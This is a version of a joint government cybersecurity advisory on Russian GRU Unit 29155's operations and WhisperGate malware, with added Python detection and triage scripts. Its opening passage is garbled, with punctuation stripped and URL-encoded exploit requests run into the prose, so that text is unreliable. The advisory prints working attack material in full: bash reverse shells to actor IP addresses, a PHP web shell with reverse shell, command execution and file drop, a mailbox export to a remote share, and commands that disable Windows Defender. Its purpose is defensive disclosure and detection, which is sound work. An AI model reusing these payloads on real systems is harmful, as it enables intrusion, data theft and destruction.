CMSfilesloghtm HTTP11 nslookup hitccruvbrumn76c1bbxssmeperl e gethostbynamehitccruvbrumn76c1bbxssmeppAs the cyber actors perform reconnaissance on victim networks and discover vulnerabilities within victim web servers or machines they obtain CVE exploit scripts from GitHub repositories and use them against victim infrastructure T1588005 Unit 29155 cyber actors have been observed obtaining the respective exploit scripts for but not exploiting the following CVEsppAnalysis concluded Unit 29155 cyber actors have exploited the following CVEs for initial access T1190 as detailed throughout this advisoryppRather than build custom solutions Unit 29155 cyber actors use common red teaming techniques and publicly available tools to conduct cyber operations As a result many TTPs overlap with those of other cyber actors which can lead to misattributionppUnit 29155 actors and their cybercriminal affiliates commonly maintain accounts on dark web forums this has provided the opportunity to obtain various hacker tools such as malware and malware loaders T1588001 like Raspberry Robin and SaintBot While Unit 29155 cyber actors are best known for their use of WhisperGate malware against Ukraine the use of WhisperGate is not unique to the group Technical analysis can be found in Appendix A WhisperGate Malware AnalysisppUnit 29155 cyber actors are known to use VPNs to anonymize their operational activity These cyber actors commonly attempt to exploit weaknesses in internetfacing systems like the CVEs listed above to initially access networks In one instance Unit 29155 cyber actors exploited CVE202133044 and CVE202133045 on Dahua IP cameras to bypass identity authenticationppUnit 29155 cyber actors have used Shodan to scan for Internet of Things IoT devices using exploitation scripts to authenticate to IP cameras with default usernames and passwords T1078001 and exfiltrating images T1125 JPG files Attempts are then made to perform remote command execution via web to vulnerable IP cameras 
if successful cyber actors would dump configuration settings and credentials in plaintext as shown in Table 1 below T1552001ppAppendix B Indicators of Compromise lists threat actor IP addresses associated with the activity detailed in this sectionppNote These events are independent and not correlated as a single timeline of compromiseppThese requests are likely intended to dump configuration settings and credentials T1003pphxxpIPportPictureCatchcgiusernameNAMEpassword3becho20223c2123include20file22SYSCFG223e223etmpLoginhtm3bdatatype1attachment1channel1secret1keyPWNEDpphxxpIPportssicgitmpLoginhtmpptxtUserloltxtPassword2btConnectPieslC493gtiesbtConnectPieslC493gtieschRememberontxtPasswordg00dPa2424w0rDtxtUser7bprintsystem22bash20i203E26202Fdev2Ftcp2F17943175382F68702003E261227dpptxtUserloltxtPassword2btConnectPieslC493gtiesbtConnectPieslC493gtieschRememberontxtPasswordg00dPa2424w0rDtxtUser7bprintsystem22bash20i203E26202Fdev2Ftcp2F8117241302F68702003E261227dppprintsystembash i devtcp17943175386870 01ppprintsystembash i devtcp8117241306870 01ppIn addition incident analysis identified the general observations listed below on victim infrastructure Each event should be considered independent and may have been used by Unit 29155 cyber actors against multiple victims at different dates and timeframes Appendix B Indicators of Compromise lists IOCs associated with the observations in Table 1 and belowppSince at least 2020 Unit 29155 cyber actors have used virtual private servers VPSs T1583003 to host their operational tools perform reconnaissance exploit victim infrastructure and exfiltrate victim data Use of VPSs are common due to the associated IP addresses not identifying their true country of originppWhen an exploit is successfully executed on a victim system the actors can then launch a Meterpreter payload T1105 which commonly uses a reverse Transmission Control Protocol TCP connection to initiate communication with the threat actors infrastructure T1095 In one instance 
an established reverse TCP session was observed from victim to actor infrastructure via the following ports:

Additional observations were collected from victim engagement and analysis, including:

Once Unit 29155 cyber actors gain access to the victim's internal network, the victims have observed:

The following process listings were captured on victim hosts. A binary named java was started with shell history disabled (HISTFILE=/dev/null) from the hidden /tmp/.ICE-unix directory; read literally, its arguments first open a local SOCKS5 listener and then expose that listener as a reverse TCP forward through an external SOCKS5 proxy on port 7896:

```
8212 SJ 00254 HISTFILE=/dev/null PATH=/sbin:/bin:/usr/sbin:/usr/bin LD_LIBRARY_PATH=/usr/local/lib:/usr/local/lib OLDPWD=/tmp PWD=/tmp/.ICE-unix HOME= RC_PID=33980 java -L socks5://127.0.0.1:13338
8282 IJ 00398 HISTFILE=/dev/null PATH=/sbin:/bin:/usr/sbin:/usr/bin LD_LIBRARY_PATH=/usr/local/lib:/usr/local/lib OLDPWD=/tmp PWD=/tmp/.ICE-unix HOME= RC_PID=33980 java -L rtcp://0.0.0.0:13381/127.0.0.1:13338 -F socks5://<IP Address>:7896
```

The following PHP web shell code was also observed. It provides three functions: a reverse shell that connects back to a base64-encoded host and port supplied in a POST parameter, execution of a base64-encoded command, and a file drop that writes base64-encoded content to an attacker-chosen path:

```php
<?php
// Reverse shell: POST parameter sessionsidwp carries base64("host<sep>port").
// The separator character was lost in extraction; ':' is assumed here.
if (isset($_POST['sessionsidwp'])) {
    $poll_id = $_POST['sessionsidwp'];
    $sessii = explode(':', base64_decode($poll_id));
    $sock = fsockopen($sessii[0], $sessii[1]);
    // Attach an interactive /bin/sh to the socket as stdin, stdout and stderr
    $proc = proc_open('/bin/sh -i', array(0 => $sock, 1 => $sock, 2 => $sock), $pipes);
}

// Command execution: decode and run a base64-encoded command
function nbres($a) {
    eval(system(base64_decode($a)));
}

// File drop: write the base64-decoded content of fl to the path given in f2
if (isset($_POST['fl'])) {
    $fl = $_POST['fl'];
    $f2 = $_POST['f2'];
    $content = base64_decode($fl);
    $h = fopen($f2, 'w');
    $text = $content;
    fwrite($h, $text);
    fclose($h);
}
```

Exfiltration

In several instances, analysis identified Unit 29155 cyber actors compressing victim data [T1560] (e.g., the entire filesystem, select file system artifacts, or user data and/or database dumps) to send back to their infrastructure. These cyber actors commonly use the command-line program Rclone to exfiltrate data from victim infrastructure to a remote location.

Unit 29155 cyber actors have exfiltrated Windows processes and artifacts such as Local Security Authority Subsystem Service (LSASS) memory dumps [T1003.001], Security Accounts Manager (SAM) files [T1003.002], and SECURITY and SYSTEM event log files [T1654]. As seen in victim incident response results, actor infrastructure has also been used to compromise multiple mail servers [T1114] and exfiltrate mail artifacts such as email messages using PowerShell [T1059.001] via the following command, which exports a mailbox to a PST file on an actor-controlled network share:

```
powershell New-MailboxExportRequest -Mailbox <resource> -FilePath "\\<IP Address>\share\folder1.pst"
```

See Table 3 to Table 14 for all referenced threat actor tactics and techniques in this advisory.
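The post-access and exfiltration observations above share a useful property for defenders: each one shows up in process-start telemetry as a command line or environment string with a distinctive shape (listener and forward-chain URLs in a process not named like a proxy tool, HISTFILE pointed at /dev/null, a working directory under a dotted /tmp path, rclone transfers, and New-MailboxExportRequest writing to a UNC path). The following Python script is an added example written for this page, not tooling from the advisory or the authoring agencies. Its events are constructed; the port numbers echo the listings above, 198.51.100.9 is a documentation-range stand-in for actor infrastructure, and the ProxyChains pattern noted later in the advisory is included because it belongs to the same family of pivoting behaviour.

```python
import re
from typing import Dict, List, Tuple

# Constructed process-start events (not from the advisory). Command lines echo the
# shapes described above; 198.51.100.9 is a documentation-range stand-in.
SAMPLE_EVENTS = [
    {"host": "web01", "pid": 8212, "image": "java",
     "cmdline": "java -L socks5://127.0.0.1:13338",
     "env": "HISTFILE=/dev/null PATH=/sbin:/bin:/usr/sbin:/usr/bin OLDPWD=/tmp PWD=/tmp/.ICE-unix HOME="},
    {"host": "web01", "pid": 8282, "image": "java",
     "cmdline": "java -L rtcp://0.0.0.0:13381/127.0.0.1:13338 -F socks5://198.51.100.9:7896",
     "env": "HISTFILE=/dev/null PWD=/tmp/.ICE-unix HOME="},
    {"host": "web01", "pid": 9001, "image": "proxychains4",
     "cmdline": "proxychains4 -q nmap -sT -p 445 10.0.0.0/24", "env": "PWD=/root"},
    {"host": "db02", "pid": 4410, "image": "rclone",
     "cmdline": "rclone copy /var/lib/postgresql/dumps remote:exfil --transfers 8", "env": "PWD=/root"},
    {"host": "mail01", "pid": 5120, "image": "powershell.exe",
     "cmdline": 'powershell New-MailboxExportRequest -Mailbox resource -FilePath "\\\\198.51.100.9\\share\\folder1.pst"',
     "env": ""},
    {"host": "web01", "pid": 1200, "image": "java",
     "cmdline": "java -jar /opt/app/app.jar --server.port=8080", "env": "PATH=/usr/bin PWD=/opt/app"},
]

# -L <scheme>://... declares a listener and -F <scheme>://... a forward-chain hop;
# rtcp:// binds a port on the remote hop and tunnels it back, i.e. a reverse SOCKS pivot.
FORWARDER_RE = re.compile(r"(?:^|\s)-[LF]\s+(?:socks5|socks4|rtcp|rudp|tcp|udp|http|https|ss)://", re.I)
PROXYCHAINS_RE = re.compile(r"(?:^|/)proxychains\d*\s")
RCLONE_RE = re.compile(r"(?:^|/)rclone\s+(?:copy|copyto|sync|move|moveto)\b")
# Mailbox export whose destination is a UNC path (\\host\share\...), i.e. leaves the server
MAILBOX_EXPORT_RE = re.compile(r'New-MailboxExportRequest\b.*-FilePath\s+"?\\\\', re.I)
HISTFILE_RE = re.compile(r"(?:^|\s)HISTFILE=/dev/null(?:\s|$)")
HIDDEN_TMP_CWD_RE = re.compile(r"(?:^|\s)PWD=/tmp/\.")
ENDPOINT_RE = re.compile(r"([a-z0-9]+)://([\w.\-]+):(\d+)", re.I)

# Rule order determines the order of names in each alert
RULES = [
    ("forwarder-flags", lambda ev: FORWARDER_RE.search(ev["cmdline"]) is not None),
    ("proxychains", lambda ev: PROXYCHAINS_RE.search(ev["cmdline"]) is not None),
    ("rclone-transfer", lambda ev: RCLONE_RE.search(ev["cmdline"]) is not None),
    ("mailbox-export-to-unc", lambda ev: MAILBOX_EXPORT_RE.search(ev["cmdline"]) is not None),
    ("histfile-devnull", lambda ev: HISTFILE_RE.search(ev["env"]) is not None),
    ("hidden-tmp-cwd", lambda ev: HIDDEN_TMP_CWD_RE.search(ev["env"]) is not None),
]


def scan_events(events: List[Dict]) -> List[Dict]:
    """Return one alert per event that trips at least one rule."""
    alerts = []
    for ev in events:
        hits = [name for name, check in RULES if check(ev)]
        if hits:
            alerts.append({"host": ev["host"], "pid": ev["pid"], "image": ev["image"], "rules": hits})
    return alerts


def extract_proxy_endpoints(cmdline: str) -> List[Tuple[str, str, int]]:
    """(scheme, host, port) for each listener/forward URL; non-loopback hosts are the pivot hops to block."""
    return [(s.lower(), h, int(p)) for s, h, p in ENDPOINT_RE.findall(cmdline)]


if __name__ == "__main__":
    for a in scan_events(SAMPLE_EVENTS):
        print(a["host"], a["pid"], a["image"], ",".join(a["rules"]))
    print(extract_proxy_endpoints(SAMPLE_EVENTS[1]["cmdline"]))
```

The benign JVM start in the last event does not alert, which is the point of matching on the listener/forward syntax rather than on the process name the actors chose; the environment rules are low-signal alone but, stacked with the forwarder flags on the same process, give a high-confidence hit.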
For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK's Best Practices for MITRE ATT&CK Mapping and CISA's Decider Tool.

Unit 29155 cyber actors have used a variety of public exploits, including CVE-2021-33044 and CVE-2021-33045 (authentication bypass in Dahua devices), CVE-2022-26134 (OGNL injection in Atlassian Confluence Server and Data Center), and CVE-2022-26138 (hard-coded credentials in the Questions for Confluence app).

The proof-of-concept exploit for CVE-2022-26134, "Through the Wire," has also been used against a victim's internet-facing Confluence server.

Unit 29155 cyber actors executed commands via ProxyChains, a tool used to route traffic through a series of proxies.

ProxyChains was also used to provide further anonymity and to modify system configuration to force network traffic through chains of SOCKS5 proxies and their respective ports.

The authoring agencies recommend organizations implement the mitigations supplied below to improve organizational cybersecurity posture based on threat actor activity. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA's Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.

In addition to applying mitigations, the authoring agencies recommend exercising, testing, and validating your organization's security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. The authoring agencies recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.

To get started:

The authoring agencies recommend continually testing your security program at scale in a
production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.

To report suspicious or criminal activity related to information found in this joint Cybersecurity Advisory, contact your local FBI field office or CISA's 24/7 Operations Center at SAYCISA@cisa.dhs.gov or (888) 282-0870. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. For NSA client requirements or general cybersecurity inquiries, contact Cybersecurity_Requests@nsa.gov.

The information in this report is being provided "as is" for informational purposes only. CISA and the authoring agencies do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise does not constitute or imply endorsement, recommendation, or favoring by CISA and the authoring agencies.

September 5, 2024: Initial version.

This technical analysis details the WhisperGate malware deployed against Ukraine; samples were collected from one victim and analyzed. The analysis provides insight into Unit 29155 cyber actor infrastructure used for network scanning, password compromise, and data exfiltration against Ukraine, NATO members in Europe and North America, and countries in Latin America and Central Asia.

Unit 29155 cyber actors' use of WhisperGate involved the deployment of the malware files stage1.exe and stage2.exe. WhisperGate has two stages that corrupt a system's master boot record, display a fake ransomware note, and corrupt files with certain file extensions (see AA22-057A and the WhisperKill analysis below). The actors used multiple Discord accounts to store malware files, including what appears to be
development versions or iterations of the binaries. Discord is commonly leveraged by threat actors as an endpoint for malware distribution and control; in this case it was used to obtain the next step of the infection chain by directly sharing files through its platform. In the case of stage2.exe, the binary communicated with Discord to obtain Tbopbh.jpg, the malicious payload that is loaded in memory and performs the destructive capabilities [18].

The Discord accounts associated with the WhisperGate campaign are categorized into three main clusters, labeled below as Clusters 1, 2, and 3. All clusters used Discord as a staging environment for malware deployment. These groupings are based on analysis of threat actor IP addresses and the nature of the malware that existed within the accounts. The following sections include notable details found within each cluster.

Cluster 1 contained the following files:

Cluster 2 contained:

Cluster 3 contained:

Two Windows Portable Executable (PE) files, stage1.exe and stage2.exe, were obtained from the Ukrainian victim for analysis. One PE file, asd.exe, was obtained from a US victim.

stage1.exe was obtained from the C:\ path of the Ukrainian victim's Windows machine. stage1.exe executes when the infected device is powered down, overwriting the master boot record (MBR) and preventing the system from booting normally. Table 15 lists the hashes and properties attributed to stage1.exe.

asd.exe is likely a development version of stage1.exe. While the behavior of asd.exe is similar to stage1.exe, the messages displayed were different.

stage2.exe was obtained from the C:\ path of the Ukrainian victim's Windows machine. Table 17 lists the hashes and properties attributed to stage2.exe.

Table 18 lists the following chronological observations when stage2.exe executes. The payload was retrieved from the following Discord attachment URL:

```
hxxp://cdn.discordapp[.]com/attachments/928503440139771947/930108637681184768/Tbopbh.jpg
```

The Visual Basic Script (VBS) file contained the following command, which excludes the entire C:\ drive from Windows Defender scanning:

```vbscript
CreateObject("WScript.Shell").Run "powershell Set-MpPreference -ExclusionPath 'C:\'", 0, False
```

The NirSoft AdvancedRun utility was then used to stop the Windows Defender service and delete its data directory, running both commands as TrustedInstaller (/RunAs 8):

```
C:\Users\user\AppData\Local\Temp\AdvancedRun.exe /EXEFilename "C:\Windows\System32\sc.exe" /WindowState 0 /CommandLine "stop WinDefend" /StartDirectory "" /RunAs 8 /Run
C:\Users\user\AppData\Local\Temp\AdvancedRun.exe /EXEFilename "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" /WindowState 0 /CommandLine "rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse" /StartDirectory "" /RunAs 8 /Run
```

Static analysis was further conducted on two files, stage2.exe and Tbopbh.jpg, to uncover additional malware functionality and attributes.

Static analysis was performed on a variant of stage2.exe; its hashes and properties are listed in Table 19 below. Of note, the MD5 and SHA256 hash values were different from those obtained from the Ukrainian victim machine listed above in Table 17. Behavioral analysis was also performed on the variant below, and both files exhibited the same behavior.

This variant of stage2.exe contained multiple layers of execution:

An account in Discord Cluster 1 contained malware with the following hashes, labeled as Tbopbh.jpg:

When viewing payload Tbopbh.jpg in a hex editor, it ended with the value "ZM" (hex 5A 4D), the DOS "MZ" magic read backwards; this indicated the payload was a byte-reversed PE. Reversing the bytes of Tbopbh.jpg produced the payload whose hashes are listed in Table 20 below.

The original filename of the resulting payload was a Dynamic Link Library (DLL) file, Frkmlkdkdubkznbkmcf.dll; its attributes are listed in Table 21.

Identifiers inside the DLL were replaced with strings of Unicode whitespace characters, for example:

```
\u2005 \u2005 \u2009 \u2008 \u2001 \u2007 \u2009 \u200b \u200a \u2005
```

Note: This format annotates action taken by Eazfuscator to obfuscate items, making it difficult for malware analysts to review.

stage2.exe was observed calling method Ylfwdwgmpilzyaph to begin decrypting resource 78c855a088924e92a7f60d661c3d1845. The reflection library was used to execute method Ylfwdwgmpilzyaph, as shown in the following C# code block:

```csharp
using System;
using System.IO;
using System.Reflection;

// Load the reversed-and-recovered DLL from disk and invoke its entry method by name
string path = "Frkmlkdkdubkznbkmcf.dll";
string fqpn = Path.GetFullPath(path);
Assembly assembly = Assembly.LoadFile(fqpn);
Type type = assembly.GetType("ClassLibrary1.Main");
type.InvokeMember("Ylfwdwgmpilzyaph", BindingFlags.InvokeMethod, null, null, null);
```

The following application configuration accompanied the above code block to allow loading from remote sources:

```xml
<?xml version="1.0" encoding="utf-8"?>
<configuration>
  <runtime>
    <loadFromRemoteSources enabled="true"/>
  </runtime>
</configuration>
```

Upon invoking the method Ylfwdwgmpilzyaph, Nmddfrqqrbyjeygggdav.vbs was written to the Windows TEMP directory; its attributes are listed in Table 22 below.

The VBS code listed in Table 22 used a WScript shell that executed as a Windows application, which ran a PowerShell command to exclude the C:\ drive from Windows Defender's security checks. Malware analysts decoded and decrypted one of the resources from Frkmlkdkdubkznbkmcf.dll, 78c855a088924e92a7f60d661c3d1845. Further analysis of Frkmlkdkdubkznbkmcf.dll resulted in an additional DLL file with the following hashes:

This decrypted DLL file contained two resources: AdvancedRun and Waqybg.

Table 23 and Table 24 list the file properties for both the AdvancedRun and reversed Waqybg decompressed files.

The reversed and decompressed Waqybg file contained file corruption logic along with a final command to ping an arbitrary address and delete itself (the path of the malware's own file follows the Del switches):

```
cmd.exe /min /C ping 111.111.111.111 -n 5 -w 10 > Nul & Del /f /q /s
```

Waqybg is known as WhisperKill, a malware downloaded by WhisperGate that destroys files with specific extensions [19-21].

The file extensions listed in Table 25 were targeted for file corruption, matched with the equivalent of the C wcscmp string-compare function. The corruption logic overwrites the first 0x100000 bytes (1 MB) of each targeted file with the value 0xCC.

stage2.exe and its respective payload Tbopbh.jpg served as a template for other malware within Discord Cluster 1. While most of these other malware files have not been observed in open-source reporting, malware analysts assess them as payloads that follow the unravelling process listed in Figure 1 below.

Table 26 below provides a list of MD5 hashes for files found within Discord Cluster 1. When reversed, these files become DLL files that were structured similarly to Frkmlkdkdubkznbkmcf.dll.

Note: Analysts identified the files below in Discord Cluster 1; the files are staged on the cluster in reversed byte order. Analysts reversed the byte order of each file into its proper portable executable (i.e., functional) format. The hashes in Table 26 represent both byte orders.

Table 27 lists observed IP addresses that were first seen as early as 2022 and have been historically linked to Unit 29155 infrastructure. These IPs are considered historical infrastructure and should be investigated for associated abnormal or malicious activity.

Threat actors can exploit jump hosts (also known as jump servers or bastion hosts) to gain unauthorized access or perform malicious activities within a protected network. In this context, the domains listed in Table 28 represent the tools used to establish functionality for creating a jump host.
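Two of the Appendix A observations translate directly into triage checks that an analyst can run over a pile of recovered files: a byte-reversed PE (the Tbopbh.jpg staging trick, recognisable by a trailing "ZM") can be flipped back and validated by walking the DOS header to the PE signature, and a WhisperKill victim file is recognisable by its leading 0x100000 bytes all being 0xCC. The following Python script is an added example written for this page, not code from the advisory or the authoring agencies. The minimal PE used as a fixture is constructed and is not a runnable binary, and because the page does not reproduce the extension list from Table 25, the targeted extensions are passed in by the caller rather than hard-coded.

```python
import struct
from typing import Dict, List, Optional, Tuple

DOS_MAGIC = b"MZ"
PE_SIG = b"PE\0\0"


def looks_reversed_pe(blob: bytes) -> bool:
    """A byte-reversed PE ends with b'ZM' (the DOS magic read backwards)."""
    return len(blob) >= 2 and blob[-2:] == DOS_MAGIC[::-1]


def parse_pe_header(data: bytes) -> Optional[Tuple[int, int]]:
    """Return (e_lfanew, machine) when data has a consistent DOS header -> PE signature chain, else None."""
    if len(data) < 0x40 or data[:2] != DOS_MAGIC:
        return None
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]       # offset of the PE signature
    if e_lfanew + 6 > len(data) or data[e_lfanew:e_lfanew + 4] != PE_SIG:
        return None
    machine = struct.unpack_from("<H", data, e_lfanew + 4)[0]  # IMAGE_FILE_HEADER.Machine
    return e_lfanew, machine


def recover_reversed_payload(blob: bytes) -> Optional[bytes]:
    """Undo the byte reversal used for Tbopbh.jpg-style staging and validate the result.
    Returns the forward-order PE, or None if the blob is not a reversed PE."""
    if not looks_reversed_pe(blob):
        return None
    data = blob[::-1]
    return data if parse_pe_header(data) is not None else None


def build_minimal_pe(machine: int = 0x14C) -> bytes:
    """Constructed test fixture: a DOS stub pointing at a PE signature (not a runnable binary)."""
    header = bytearray(0x40)
    header[:2] = DOS_MAGIC
    struct.pack_into("<I", header, 0x3C, 0x40)   # e_lfanew: PE signature right after the DOS header
    return bytes(header) + PE_SIG + struct.pack("<H", machine) + b"\0" * 18


CORRUPT_FILL = 0xCC
CORRUPT_LEN = 0x100000   # 1 MB of 0xCC per targeted file, as described above


def is_whisperkill_corrupted(data: bytes, fill: int = CORRUPT_FILL, length: int = CORRUPT_LEN) -> bool:
    """True when the leading min(len(data), length) bytes are all the fill byte.
    Assumption (not stated on the page): a file shorter than the overwrite length ends up entirely fill bytes."""
    head = data[:length]
    return len(head) > 0 and head == bytes([fill]) * len(head)


def triage_files(files: Dict[str, bytes], targeted_exts: set) -> List[str]:
    """Names of files whose extension is in the targeted set and whose content matches the overwrite pattern."""
    flagged = []
    for name, data in files.items():
        ext = name[name.rfind("."):].lower() if "." in name else ""
        if ext in targeted_exts and is_whisperkill_corrupted(data):
            flagged.append(name)
    return flagged


if __name__ == "__main__":
    pe = build_minimal_pe()
    staged = pe[::-1]                                  # what the Discord-hosted blob looks like
    print("reversed PE recovered:", recover_reversed_payload(staged) == pe)
    # Constructed sample set: one overwritten document, one intact text file, one non-targeted type
    sample = {"q.docx": b"\xcc" * CORRUPT_LEN, "n.txt": b"hello", "p.bin": b"\xcc" * CORRUPT_LEN}
    print("corrupted:", triage_files(sample, {".docx", ".txt"}))
```

The header walk matters: a blob that merely ends in "ZM" is not enough, since the reversal must also yield an e_lfanew that lands on "PE\0\0" before the recovered bytes are worth loading into a disassembler. The corruption check deliberately looks only at the first 1 MB so that larger files with intact tails are still flagged.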